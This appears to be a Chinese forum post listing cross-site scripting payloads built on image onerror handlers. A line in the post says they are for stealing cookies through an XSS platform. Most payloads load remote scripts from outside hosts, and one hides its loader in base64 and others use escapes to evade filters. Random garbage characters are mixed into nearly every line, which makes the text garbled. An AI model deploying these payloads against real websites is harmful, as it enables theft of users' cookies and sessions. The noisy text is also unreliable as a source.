<img src='non-exist.jpg'onerror="alert('xss')">
0 Q" c( c5 T# R8 E$ N: w<img src=# onerror=alert(123)>
/ d' r5 W ~7 K. J1 n* X5 R<img src=# onerror=alert(document.cookie)>( C E9 r! J/ b. w; J
下面是利用平台钓cookie的
: F! Z' e. R; A& S/ H/ I n- D& L <img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>( O0 \9 `6 P! ~
1 D o0 F2 _! G$ H2 C+ _# |
) Q# q, d3 C _3 S0 p2 O' H/ \9 V
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
: b3 O9 ]3 Z4 i<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
3 s( U" D& A' \) R: L k“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>3 s* [) C, t9 l+ s7 l) E! z
<img src=1 onerror=jQuery.getScript("//xss.re/974")>
7 \' t3 o9 J4 t c I, }4 l) m<img src="#">
4 T& y7 k5 f* X5 C0 ?! M<img src="#">5 M5 C# c( L; i
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
' p& u/ Z; _, D6 d0 l6 E8 V0 n, p<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">0 y6 \/ N# o0 w& k1 G
<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
% _7 M& A. s* N<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
. c1 S( m" V$ W* ], _3 S5 s<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>2 M, ~2 I4 M0 Y& j
<img src=x width="0" height="0"></img>
; ^% o5 L# Q' [) c6 F<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
4 {) n2 N9 ~+ \0 y& u6 k- B<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>) ]3 Q- z$ O9 A7 V: |; n
|
发表于 2015-10-18 14:33:54
收藏
支持
反对